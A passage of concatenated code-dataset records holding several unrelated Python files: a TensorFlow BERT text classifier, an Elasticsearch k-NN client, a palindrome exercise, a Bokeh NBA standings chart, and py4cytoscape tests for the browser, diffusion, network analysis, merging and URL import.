False,\n):\n model = modeling.BertModel(\n config = bert_config,\n is_training = is_training,\n input_ids = input_ids,\n input_mask = input_mask,\n token_type_ids = segment_ids,\n use_one_hot_embeddings = use_one_hot_embeddings,\n )\n\n output_layer = model.get_pooled_output()\n hidden_size = output_layer.shape[-1].value\n with tf.variable_scope('weights', reuse = reuse_flag):\n output_weights = tf.get_variable(\n 'output_weights',\n [num_labels, hidden_size],\n initializer = tf.truncated_normal_initializer(stddev = 0.02),\n )\n output_bias = tf.get_variable(\n 'output_bias', [num_labels], initializer = tf.zeros_initializer()\n )\n\n with tf.variable_scope('loss'):\n def apply_dropout_last_layer(output_layer):\n output_layer = tf.nn.dropout(output_layer, keep_prob = 0.9)\n return output_layer\n\n def not_apply_dropout(output_layer):\n return output_layer\n\n output_layer = tf.cond(\n is_training,\n lambda: apply_dropout_last_layer(output_layer),\n lambda: not_apply_dropout(output_layer),\n )\n logits = tf.matmul(output_layer, output_weights, transpose_b = True)\n print(\n 'output_layer:',\n output_layer.shape,\n ', output_weights:',\n output_weights.shape,\n ', logits:',\n logits.shape,\n )\n\n logits = tf.nn.bias_add(logits, output_bias)\n probabilities = tf.nn.softmax(logits)\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels = labels, logits = logits\n )\n loss = tf.reduce_mean(loss)\n correct_pred = tf.equal(tf.argmax(logits, 1, output_type = tf.int32), labels)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n return loss, logits, probabilities, model, accuracy\n\nclass Model(object):\n \"\"\"\n A RNN for text classification.\n\n \"\"\"\n def __init__(\n self, seq_len, embedding_size,\n vocab_size, num_classes, learning_rate, size_layer, num_layers):\n\n self.seq_len = seq_len\n self.embedding_size = embedding_size\n self.vocab_size = vocab_size\n self.num_classes = num_classes\n self.learning_rate = learning_rate\n self.size_layer = size_layer\n self.num_layers = num_layers\n\n self.build_model()\n def build_model(self):\n # Placeholders for input, output\n\n BERT_VOCAB = '../chinese_L-12_H-768_A-12/vocab.txt'\n BERT_INIT_CHKPNT = '../chinese_L-12_H-768_A-12/bert_model.ckpt'\n BERT_CONFIG = '../chinese_L-12_H-768_A-12/bert_config.json'\n tokenization.validate_case_matches_checkpoint(True, '')\n bert_config = modeling.BertConfig.from_json_file(BERT_CONFIG)\n tokenizer = tokenization.FullTokenizer(\n vocab_file=BERT_VOCAB, do_lower_case=True)\n\n bert_config = modeling.BertConfig(\n vocab_size=self.vocab_size,\n hidden_size=self.size_layer,\n num_hidden_layers=self.num_layers,\n num_attention_heads=self.size_layer // 4,\n intermediate_size=self.size_layer * 2,\n )\n\n self.input_ids = tf.placeholder(tf.int32, [None, self.seq_len])\n self.input_mask = tf.placeholder(tf.int32, [None, self.seq_len])\n self.segment_ids = tf.placeholder(tf.int32, [None, self.seq_len])\n self.label_ids = tf.placeholder(tf.int32, [None])\n self.is_training = tf.placeholder(tf.bool)\n\n use_one_hot_embeddings = False\n self.loss, self.logits, probabilities, model, self.accuracy = create_model(\n bert_config,\n self.is_training,\n self.input_ids,\n self.input_mask,\n self.segment_ids,\n self.label_ids,\n self.num_classes,\n use_one_hot_embeddings,\n )\n global_step = tf.Variable(0, trainable=False, name='Global_Step')\n self.optimizer = tf.contrib.layers.optimize_loss(\n self.loss,\n global_step=global_step,\n learning_rate=self.learning_rate,\n optimizer='Adam',\n clip_gradients=3.0,\n )\n tf.summary.scalar(\"loss\", self.loss)\n self.summary_op = tf.summary.merge_all()\n self.saver = tf.train.Saver(tf.global_variables())\n\n def train(self, sess, x_batch, y_batch):\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n np_mask = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n np_segment = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n feed_dict = {\n self.input_ids: x_batch,\n self.label_ids: y_batch,\n self.input_mask: np_mask,\n self.segment_ids: np_segment,\n self.is_training: True\n }\n _, loss, accuracy, logits, summary = sess.run([self.optimizer, self.loss, self.accuracy, self.logits, self.summary_op],\n feed_dict=feed_dict)\n # y_label = np.argmax(y_batch, 1)\n prediction = np.argmax(logits, 1)\n print(metrics.classification_report(y_batch, prediction))\n return loss, summary\n def eval(self, sess, x_batch, y_batch):\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n np_mask = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n np_segment = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n feed_dict = {\n self.input_ids: x_batch,\n self.label_ids: y_batch,\n self.input_mask: np_mask,\n self.segment_ids: np_segment,\n self.is_training: False\n }\n _, loss, accuracy, logits, summary = sess.run([self.optimizer, self.loss, self.accuracy, self.logits, self.summary_op],\n feed_dict=feed_dict)\n # y_label = np.argmax(y_batch, 1)\n prediction = np.argmax(logits, 1)\n print(metrics.classification_report(y_batch, prediction))\n return loss, summary\n\n def infer(self, sess, x_batch):\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n np_mask = np.ones((len(x_batch), self.seq_len), dtype=np.int32)\n np_segment = np.ones((len(x_batch), self.seq_len), dtype=np.int32)\n feed_dict = {\n self.input_ids: x_batch,\n self.input_mask: np_mask,\n self.segment_ids: np_segment,\n self.is_training: False\n }\n logits = sess.run(self.logits, feed_dict=feed_dict)\n # y_label = np.argmax(y_batch, 1)\n prediction = np.argmax(logits, 1)\n # print(metrics.classification_report(y_batch, prediction))\n return prediction\n","repo_name":"Xu22/tensorflow-nlp","sub_path":"text-classification/model/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36386250764","text":"\"\"\"Forked from\nhttps://github.com/alexklibisz/elastiknn/tree/master/client-python/elastiknn\"\"\"\n\nimport multiprocessing\nfrom typing import Dict, List\n\nimport numpy as np\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import parallel_bulk\nfrom tqdm import tqdm\nfrom vectory.db.models import ElasticSearchIndexModel\n\nfrom .api import Mapping, NearestNeighborsQuery, Vec\n\n\nclass ElasticKNNClient:\n def __init__(self, es: Elasticsearch = None):\n \"\"\"Wrapper on the official `elasticsearch.Elasticsearch` client for making\n Elastiknn requests.\n Parameters\n ----------\n es : `elasticsearch.Elasticsearch` client.\n This client is used internally to make all requests.\n Defaults to a client pointing at http://localhost:9200.\n \"\"\"\n if es is None:\n self.es = Elasticsearch([\"http://localhost:9200\"], timeout=99)\n else:\n self.es = es\n\n def __enter__(self) -> \"ElasticKNNClient\":\n return self\n\n def __close__(self, *args):\n self.close()\n\n def close(self):\n self.es.close()\n\n def __exit__(self, *args):\n self.es.close()\n\n def delete_indices(self, indices: List[ElasticSearchIndexModel]):\n for index in indices:\n self.delete_index(index.name)\n\n def delete_index(self, index_name: str):\n self.es.indices.delete(index=index_name, ignore=[404])\n\n def create_index(\n self,\n index_name: str,\n mapping: Mapping.Base,\n header_mapping: dict,\n number_of_shards: int = 1,\n ):\n \"\"\"\n Update the mapping at the given index and field to store an Elastiknn vector.\n\n Parameters\n ----------\n index_name : string\n Name of the index to create for knn search\n mapping : instance of `Mapping.Base`\n Mapping object defining the vector's storage properties.\n header_mapping : dict\n Mapping that defines the metadata fields that will be stored in the index.\n number_of_shards : int\n Number of shards to use for the index. Elastiknn queries execute once per\n shard in parallel, you can generally speed up your queries by adding more\n shards to the index. Defaults to 1.\n\n Returns\n -------\n Dict\n Json response as a dict. Successful request returns\n `{\"acknowledged\": true}`.\n \"\"\"\n index_settings = {\"number_of_shards\": number_of_shards, \"elastiknn\": True}\n index_mappings = {\n \"properties\": {\n \"embedding\": mapping.to_dict(),\n **header_mapping,\n }\n }\n\n return self.es.indices.create(\n index=index_name,\n settings=index_settings,\n mappings=index_mappings,\n )\n\n def index(\n self,\n index: str,\n embeddings: np.ndarray,\n metadata: List[dict],\n id_field: str,\n refresh: bool = False,\n num_threads: int = max(2, multiprocessing.cpu_count() - 2),\n chunk_size: int = 1000,\n ) -> int:\n \"\"\"Index (i.e. store) the given vectors at the given index and field with the\n optional ids.\n\n Parameters\n ----------\n index : string\n Index where the vectors are stored.\n embeddings : Numpy array\n Vectors that should be indexed.\n metadata : List of Dicts\n Metadata associated with the given vectors. Should have same length as vecs.\n id_field:\n Field containing the document ID. Uses `store: true` setting as an\n optimization for faster id-only queries.\n refresh : bool\n Whether to refresh before returning. Set to true if you want to immediately\n run queries after indexing.\n num_threads : int\n Number of threads to use for indexing.\n chunk_size : int\n Number of vectors to index in a single bulk request.\n\n Returns\n -------\n Int\n Number of vectors successfully indexed.\n \"\"\"\n\n def embedding_generator():\n for embedding, embedding_metadata in zip(embeddings, metadata):\n yield {\n \"_op_type\": \"index\",\n \"_index\": index,\n \"_id\": str(embedding_metadata.get(id_field)),\n \"embedding\": Vec.DenseFloat(list(embedding)).to_dict(),\n **embedding_metadata,\n }\n\n succeses = 0\n for ok, _ in tqdm(\n parallel_bulk(\n client=self.es,\n actions=embedding_generator(),\n thread_count=num_threads,\n chunk_size=chunk_size,\n )\n ):\n succeses += ok\n\n if refresh:\n self.es.indices.refresh(index=index)\n\n return succeses\n\n def list_indices(self) -> List[str]:\n index_names = []\n for index_json in self.es.cat.indices(format=\"json\"):\n index_names.append(index_json[\"index\"]) # type: ignore\n return index_names\n\n def nearest_neighbors(\n self,\n index: str,\n query: NearestNeighborsQuery.Base,\n id_field: str,\n k: int = 10,\n fetch_source: bool = False,\n ) -> Dict:\n \"\"\"Build and execute a nearest neighbors query against the given index.\n\n Parameters\n ----------\n index : string\n Index to run the search against.\n query : NearestNeighborsQuery.Base\n Query object defining the query properties.\n id_field:\n Field containing the document ID. Uses `store: true` setting as an\n optimization for faster id-only queries.\n k: int\n Number of hits to return.\n fetch_source : bool\n Whether to return the `_source` of the document. If you only need the ID,\n it's generally much faster to set this to False and instead of accessing\n the ID in hit['_id'], it will be in hit['fields'][id_field][0].\n\n Returns\n -------\n Dict\n Standard Elasticsearch search response parsed as a dict.\n \"\"\"\n query_body = {\"elastiknn_nearest_neighbors\": query.to_dict()}\n if fetch_source:\n return self.es.search(index=index, query=query_body, size=k)\n else:\n return self.es.search(\n index=index,\n query=query_body,\n size=k,\n _source=fetch_source,\n docvalue_fields=[id_field],\n stored_fields=\"_none_\",\n filter_path=[f\"hits.hits.fields.{id_field}\", \"hits.hits._score\"],\n )\n","repo_name":"pentoai/vectory","sub_path":"vectory/es/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"3"} +{"seq_id":"548572349","text":"\"\"\"\nMerge-operations-to-turn-array-into-a-palindrome\n\n\nYou are given an array nums consisting of positive integers.\n\nYou can perform the following operation on the array any number of times:\n\nChoose any two adjacent elements and replace them with their sum.\nFor example, if nums = [1,2,3,1], you can apply one operation to make it [1,5,1].\nReturn the minimum number of operations needed to turn the array into a palindrome.\n\n \n\nExample 1:\n\nInput: nums = [4,3,2,1,2,3,1]\nOutput: 2\nExplanation: We can turn the array into a palindrome in 2 operations as follows:\n- Apply the operation on the fourth and fifth element of the array, nums becomes equal to [4,3,2,3,3,1].\n- Apply the operation on the fifth and sixth element of the array, nums becomes equal to [4,3,2,3,4].\nThe array [4,3,2,3,4] is a palindrome.\nIt can be shown that 2 is the minimum number of operations needed.\nExample 2:\n\nInput: nums = [1,2,3,4]\nOutput: 3\nExplanation: We do the operation 3 times in any position, we obtain the array [10] at the end which is a palindrome.\n\"\"\"\n\nclass Solution:\n def minimumOperations(self, nums: list) -> int:\n \n # Border case, empty list\n if len(nums) == 0:\n return 0\n \n # Border case, if len(list) < 3\n if len(nums) < 3:\n return sum(nums)\n\n\n left, right = 0, len(nums) - 1\n\n # Variable to count performed operations\n ops_counter:int = 0\n\n palindrome_found:bool = False\n try:\n while not palindrome_found:\n \n l_value:int = nums[left]\n r_value:int = nums[right]\n aux_value:int = 0\n if r_value < l_value:\n # Sum and delete at the right of the array\n aux_value = nums[right - 1]\n upd_right = r_value + aux_value\n\n # Update the array with the updated value\n nums[right] = upd_right\n\n # delete the aux position\n del nums[right - 1]\n\n # Update right pointer to -1 position given the new array shape\n right -= 1\n\n # Sum 1 to performed operations\n ops_counter += 1\n\n elif r_value > l_value:\n # Sum and delete at the left of the array\n aux_value = nums[left + 1]\n upd_left = l_value + aux_value\n\n #Update the array with the updated value\n nums[left] = upd_left\n\n # delete the aux position\n del nums[left + 1]\n\n # Update rigth pointer to -1 position given the new array shape\n right -= 1\n\n # Sum 1 to performed operations\n ops_counter += 1\n\n else:\n # left and right are equal, check if palindrome, if not, move the pointers\n\n # Check if the array has a middle value\n \n if (len(nums) - 1) % 2 == 0:\n middle = int(len(nums) / 2)\n #print('middle= ', middle)\n left_part = nums[:middle]\n right_part = nums[middle+1:][::-1]\n\n # If this enters, then BAM, it is a palindrome\n if left_part == right_part:\n palindrome_found = True\n #print('pal found= ', palindrome_found)\n break\n\n \n left += 1\n right -= 1\n except:\n return 0\n\n \n\n return ops_counter\n \n\n\n ","repo_name":"zzznavarrete/data_structures","sub_path":"src/exercises/arrays/30_int_palindrome.py","file_name":"30_int_palindrome.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16223121643","text":"from bokeh.io import output_file\nfrom bokeh.plotting import figure, show\nfrom bokeh.models import ColumnDataSource, CDSView, GroupFilter\n\n# Import the data\nfrom read_nba_data import *\n\n# Output to static HTML file\noutput_file('west_top_2_standings_race.html',\n title='Western Conference Top 2 Teams Wins Race')\n\n# Create a ColumnDataSource\nwest_cds = ColumnDataSource(west_top_2)\n\n# Create view for each team\nrockets_view = CDSView(source=west_cds,\n filters=[GroupFilter(column_name='teamAbbr', group='HOU')])\n\nwarriors_view = CDSView(source=west_cds,\n filters=[GroupFilter(column_name='teamAbbr', group='GS')])\n\n# Create and configure the figure\nfig = figure(x_axis_type='datetime',\n plot_height=300, plot_width=600,\n title='Western Conference Top 2 Teams Wins Race, 2017-18',\n x_axis_label='Date', y_axis_label='Wins',\n toolbar_location=None)\n\n# Render the race as step lines\nfig.step('stDate', 'gameWon', \n color='#CE1141', legend='Rockets', \n source=west_cds, view=rockets_view)\nfig.step('stDate', 'gameWon', \n color='#006BB6', legend='Warriors', \n source=west_cds, view=warriors_view)\n\n# Move the legend to the upper left corner\nfig.legend.location = 'top_left'\n\n# Show the plot\nshow(fig) ","repo_name":"lhatpku/Bokeh","sub_path":"WestConfTop2.py","file_name":"WestConfTop2.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16519535362","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Test functions in tools.py.\n\"\"\"\nimport os\n\n\"\"\"License:\n Copyright 2020-2022 The Cytoscape Consortium\n\n Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,\n and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in all copies or substantial portions\n of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\n WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\n OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport unittest\nimport time\nfrom requests import HTTPError\n\nfrom test_utils import *\n\n\nclass ToolsTests(unittest.TestCase):\n def setUp(self):\n # Close all browser windows if possible\n try:\n for browser in cybrowser_list():\n cybrowser_close(browser['id'])\n except:\n pass\n\n def tearDown(self):\n pass\n\n BROWSER_HELLO = {'id': 'Browser Hello ID',\n 'show': {'func': lambda x, y: cybrowser_show(id=x, title=y,\n text='HelloHello, world!'),\n 'title': 'Browser Hello Page'},\n 'dialog': {'func': lambda x, y: cybrowser_dialog(id=x, title=y,\n text='HelloHello, world!'),\n 'title': 'Hello'}}\n CYTOSCAPE_HOME_PAGE = {'id': 'Cytoscape Home Page ID',\n 'show': {\n 'func': lambda x, y: cybrowser_show(id=x, title=y, url='http://www.cytoscape.org'),\n 'title': 'Cytoscape Home Page'},\n 'dialog': {\n 'func': lambda x, y: cybrowser_dialog(id=x, title=y,\n url='http://www.cytoscape.org'),\n 'title': 'Cytoscape: An Open Source Platform for Complex Network Analysis and Visualization'}}\n CYTOSCAPE_MANUAL = {'id': 'Cytoscape Manual ID',\n 'show': {'func': lambda x, y: cybrowser_show(id=x, title=y,\n url='http://manual.cytoscape.org/en/3.7.2/'),\n 'title': 'Cytoscape Manual Page'},\n 'dialog': {\n 'func': lambda x, y: cybrowser_dialog(id=x, title=y,\n url='http://manual.cytoscape.org/en/3.7.2/'),\n 'title': 'Cytoscape 3.7.2 User Manual — Cytoscape User Manual 3.7.2 documentation'}}\n\n @print_entry_exit\n def test_cybrowser_version(self):\n # Verify that a version is reported\n version = cybrowser_version()\n self.assertIsInstance(version, dict)\n self.assertIsInstance(version['version'], str)\n\n @unittest.skipIf(skip_for_ui(), 'Avoiding test that requires user response')\n @print_entry_exit\n def test_cybrowser_show_list_hide(self):\n self._cybrowser_windows('show')\n\n @unittest.skipIf(skip_for_ui(), 'Avoiding test that requires user response')\n @print_entry_exit\n def test_cybrowser_dialog_list_hide(self):\n self._cybrowser_windows('dialog')\n\n @unittest.skipIf(skip_for_ui(), 'Avoiding test that requires user response')\n @print_entry_exit\n def test_cybrowser_send(self):\n self._check_show('dialog', ToolsTests.CYTOSCAPE_HOME_PAGE)\n window_id = ToolsTests.CYTOSCAPE_HOME_PAGE['id']\n\n # Verify that the user agent variable can be fetched\n res = cybrowser_send(window_id, 'navigator.userAgent')\n self.assertIsInstance(res, dict)\n self.assertEqual(res['browserId'], window_id)\n self.assertIsInstance(res['result'], str)\n\n # Verify that the window can be moved to a different URL\n res = cybrowser_send(window_id, \"window.location='http://google.com'\")\n self.assertEqual(res['browserId'], window_id)\n self.assertEqual(res['result'], 'http://google.com')\n\n self.assertRaises(CyError, cybrowser_send, 'bogus window', 'navigator.userAgent')\n\n self.assertDictEqual(cybrowser_send(window_id, 'bogus_statement'), {})\n\n @print_entry_exit\n def test_diffusion_basic(self):\n # Initialization\n load_test_session()\n\n # Verify that selecting a node and calling diffusion returns a bunch of nodes\n select_nodes(['RAP1'], by_col='COMMON')\n res = diffusion_basic()\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n # Verify that diffusion returns nodes even when nothing is selected\n clear_selection()\n res = diffusion_basic()\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_1_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_1_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n @print_entry_exit\n def test_diffusion_advanced(self):\n # Initialization\n load_test_session()\n\n # Verify that selecting a node and calling diffusion returns a bunch of nodes\n select_nodes(['RAP1'], by_col='COMMON')\n res = diffusion_advanced(heat_column_name='', time=0.1)\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n # Verify that diffusion returns nodes even when nothing is selected\n clear_selection()\n res = diffusion_advanced(heat_column_name='diffusion_output_heat', time=0.2)\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_1_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_1_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n # Verify that a bad parameter causes an exception\n self.assertRaises(CyError, diffusion_advanced, heat_column_name='diffusion_output_heat', time='x')\n\n @print_entry_exit\n def test_analyze_network(self):\n\n def check_analysis(actual, expected, compare_props):\n self.assertIsInstance(actual, dict)\n self.assertTrue(set(expected).issubset(set(actual)))\n member_equal = [expected[prop] == actual[prop] for prop in compare_props]\n self.assertFalse(False in member_equal)\n\n # Initialization\n load_test_session()\n\n check_analysis(analyze_network(),\n {'networkTitle': 'galFiltered.sif (undirected)', 'nodeCount': '330', 'edgeCount': '359',\n 'avNeighbors': '2.379032258064516', 'diameter': '27', 'radius': '14',\n 'avSpl': '9.127660963823953', 'cc': '0.06959203036053131', 'density': '0.009631709546819902',\n 'heterogeneity': '0.8534500004035027', 'centralization': '0.06375695335900727', 'ncc': '26'},\n {'networkTitle', 'nodeCount', 'edgeCount', 'diameter', 'radius', 'ncc'})\n check_analysis(analyze_network(True),\n {'networkTitle': 'galFiltered.sif (directed)', 'nodeCount': '330', 'edgeCount': '359',\n 'avNeighbors': '2.16969696969697', 'diameter': '10', 'radius': '1',\n 'avSpl': '3.4919830756382395', 'cc': '0.03544266191325015', 'density': '0.003297411808050106',\n 'ncc': '26', 'mnp': '1', 'nsl': '0'},\n {'networkTitle', 'nodeCount', 'edgeCount', 'diameter', 'radius', 'ncc', 'mnp', 'nsl'})\n\n @print_entry_exit\n def test_network_merge(self):\n\n BASIC_MERGED_NODE_PROPS = {'SUID': 'Long', 'shared name': 'String', 'name': 'String', 'selected': 'Boolean',\n 'age': 'Integer', 'first name': 'String', 'given name': 'String', 'group': 'String',\n 'id': 'String', 'score': 'Integer'}\n BASIC_MERGED_EDGE_PROPS = {'SUID': 'Long', 'shared name': 'String', 'shared interaction': 'String',\n 'name': 'String',\n 'selected': 'Boolean', 'interaction': 'String', 'data.key.column': 'Integer',\n 'owes': 'Integer', 'relationship': 'String', 'source': 'String', 'target': 'String',\n 'weight': 'Double'}\n BASIC_MERGED_NETWORK_PROPS = {'SUID': 'Long', 'shared name': 'String', 'name': 'String', 'selected': 'Boolean',\n '__Annotations': 'List'}\n BASIC_MERGED_NODES = {'node X', 'node 12', 'node 13', 'node 10', 'node 11', 'node 2', 'node 3', 'node 0',\n 'node 1'}\n BASIC_MERGED_EDGES = {'node 2 (interacts) node 3', 'node X (destroys) node 0',\n 'node 10 (interacts with) node 13', 'node 12 (interacts with) node 13',\n 'node 10 (interacts with) node 11', 'node 10 (interacts with) node 12',\n 'node 0 (interacts) node 2', 'node 0 (activates) node 3',\n 'node X (interacts with) node 10', 'node 0 (inhibits) node 1'}\n\n def check_merge(new_suid, new_title, node_count=9, edge_count=10,\n extra_node_props={}, extra_edge_props={}, extra_network_props={},\n merged_nodes=BASIC_MERGED_NODES, merged_edges=BASIC_MERGED_EDGES):\n self.assertEqual(get_network_name(suid=new_suid), new_title, 'Check title')\n self.assertEqual(get_node_count(network=new_suid), node_count, 'Check node count')\n self.assertEqual(get_edge_count(network=new_suid), edge_count, 'Check edge count')\n if node_count:\n self.assertEqual(set(get_all_nodes(network=new_suid)), merged_nodes, 'Check all nodes')\n if edge_count:\n self.assertSetEqual(set(get_all_edges(network=new_suid)), merged_edges, 'Check all edges')\n actual_nodes = BASIC_MERGED_NODE_PROPS.copy()\n actual_nodes.update(extra_node_props)\n actual_edges = BASIC_MERGED_EDGE_PROPS.copy()\n actual_edges.update(extra_edge_props)\n actual_networks = BASIC_MERGED_NETWORK_PROPS.copy()\n actual_networks.update(extra_network_props)\n self.assertDictEqual(get_table_column_types('node', network=new_suid), actual_nodes, 'Check column types')\n self.assertDictEqual(get_table_column_types('edge', network=new_suid), actual_edges, 'Check edge types')\n self.assertDictEqual(get_table_column_types('network', network=new_suid), actual_networks, 'Check network types')\n\n # Setup: clean out previous test\n close_session(False)\n \n x = {'first':1, 'second':2}\n y = {'second':2, 'first': 1}\n\n # Setup: Create the first network (Network_0)\n node_data_0 = {'id': [\"node 0\", \"node 1\", \"node 2\", \"node 3\", 'node X'],\n 'given name': [\"Barry\", \"Karen\", \"Scott\", \"Robyn\", \"X\"],\n 'group': [\"A\", \"A\", \"B\", \"B\", \"C\"],\n 'score': [20, 10, 15, 5, -10]}\n nodes_0 = df.DataFrame(data=node_data_0, columns=['id', 'given name', 'group', 'score'])\n edge_data_0 = {'source': [\"node 0\", \"node 0\", \"node 0\", \"node 2\", \"node X\"],\n 'target': [\"node 1\", \"node 2\", \"node 3\", \"node 3\", \"node 0\"],\n 'interaction': [\"inhibits\", \"interacts\", \"activates\", \"interacts\", \"destroys\"],\n 'weight': [5.1, 3.0, 5.2, 9.9, -100]}\n edges_0 = df.DataFrame(data=edge_data_0, columns=['source', 'target', 'interaction', 'weight'])\n\n create_network_from_data_frames(nodes_0, edges_0, title='Network_0')\n\n # Setup: Create the second network (Network_1)\n node_data_1 = {'id': [\"node 10\", \"node 11\", \"node 12\", \"node 13\", \"node X\"], \n 'first name': [\"Barry\", \"Karen\", \"Scott\", \"Robyn\", \"X\"],\n 'age': [7, 5, 4, 0, -1]}\n nodes_1 = df.DataFrame(data=node_data_1, columns=['id', 'first name', 'age'])\n edge_data_1 = {'source': [\"node 10\", \"node 10\", \"node 10\", \"node 12\", 'node X'],\n 'target': [\"node 11\", \"node 12\", \"node 13\", \"node 13\", \"node 10\"],\n 'relationship': [\"sister\", \"brother\", \"brother\", \"sister\", \"cousin\"],\n 'owes': [10, 20, 30, 40, -1000]}\n edges_1 = df.DataFrame(data=edge_data_1, columns=['source', 'target', 'relationship', 'owes'])\n\n # Verify that a network can be created containing dataframe encoding both nodes and edges\n create_network_from_data_frames(nodes_1, edges_1, title='Network_1')\n\n # Verify that the simplest union merge works\n check_merge(merge_networks(['Network_0', 'Network_1']), 'union: Network_0,Network_1')\n check_merge(merge_networks(['Network_0', 'Network_1'], title='My Cool Network'), 'My Cool Network')\n\n # Verify that a node merge map works -- 'called' and 'score_m' were created and have String/Integer types\n res = merge_networks(['Network_0', 'Network_1'],\n node_merge_map=[['given name', 'first name', 'called', 'String'],\n ['score', 'age', 'score_m', 'Integer']],\n title='nodes mapped')\n check_merge(res, 'nodes mapped', 9, 10, extra_node_props={'called': 'String', 'score_m': 'Integer'})\n\n # Verify that an edge merge map works -- 'profile' was created and has Double type\n res = merge_networks(['Network_0', 'Network_1'],\n edge_merge_map=[['weight', 'owes', 'profile', 'Double']],\n title='edges mapped')\n check_merge(res, 'edges mapped', 9, 10, extra_edge_props={'profile': 'Double'})\n\n # Verify that a network merge map works -- 'jumble forward' and 'jumble backward' were created and have String type\n res = merge_networks(['Network_0', 'Network_1'],\n network_merge_map=[['shared name', 'name', 'jumble forward', 'String'],\n ['shared name', 'name', 'jumble backward', 'String']],\n title='networks mapped')\n check_merge(res, 'networks mapped', 9, 10,\n extra_network_props={'jumble forward': 'String', 'jumble backward': 'String'})\n\n # It would be very reasonable to add more tests for the nodes_only, edge_keys, node_keys, and in_network_merge\n # parameters, but I can't get a good definition of what these parameters do, so I don't know what to test for. So,\n # for now, we pass them on and hope for the best.\n\n # For the operation='difference' parameter, the best test would be to execute a merge that corresponds to the\n # GUI's \"Remove all nodes that are in the 2nd network\". I don't think the parameter for this is exposed, so\n # I have to punt on checking the 'difference' operation.\n\n # Verify that an intersection leaves only the single node 'node X'\n res = merge_networks(['Network_0', 'Network_1'], operation='intersection', title='Cool Intersection')\n check_merge(res, 'Cool Intersection', node_count=1, edge_count=0, merged_nodes={'node X'}, merged_edges={})\n\n # Verify that exception is thrown for bad cases\n self.assertRaises(CyError, merge_networks, [])\n self.assertRaises(CyError, merge_networks, None)\n\n @print_entry_exit\n def test_import_file_from_url(self):\n _TEST_SANDBOX_NAME = 'test_sandbox'\n _TEST_FILE = 'test file'\n _ALTTEST_SANDBOX_NAME = '.test.sandbox'\n _FROM_URL = 'https://www.dropbox.com/s/r15azh0xb53smu1/GDS112_full.soft?dl=0'\n _FROM_URL_BYTES = 5536880\n _ALT_FROM_URL = 'https://www.dropbox.com/s/8wc8o897tsxewt1/BIOGRID-ORGANISM-Saccharomyces_cerevisiae-3.2.105.mitab?dl=0'\n _ALT_FROM_URL_BYTES = 166981992\n _NESTED_DIR = '1/2/3/'\n _ESCAPE_DIR = '1/../1/2/3/'\n\n def check_url_to_result(res, sandbox_path, file_name, expected_length):\n self.assertIsInstance(res, dict)\n self.assertSetEqual(set(res.keys()), {'filePath', 'fileByteCount'})\n expected_file = os.path.join(sandbox_path, file_name)\n self.assertTrue(os.path.samefile(res['filePath'], expected_file))\n self.assertTrue(os.path.exists(expected_file))\n self.assertEqual(os.path.getsize(res['filePath']), expected_length)\n\n def check_url_to_local_dir(sandbox_path):\n # Get rid of the local test file if it already exists\n if os.path.exists(_TEST_FILE):\n os.remove(_TEST_FILE)\n\n # Verify that a file can be transferred to the sandbox\n res = import_file_from_url(_FROM_URL, _TEST_FILE)\n check_url_to_result(res, sandbox_path, _TEST_FILE, _FROM_URL_BYTES)\n\n # Verify that the file can't be overwritten if we don't want it to be\n self.assertRaises(CyError, import_file_from_url, source_url=_ALT_FROM_URL, dest_file=_TEST_FILE,\n overwrite=False)\n check_url_to_result(res, sandbox_path, _TEST_FILE, 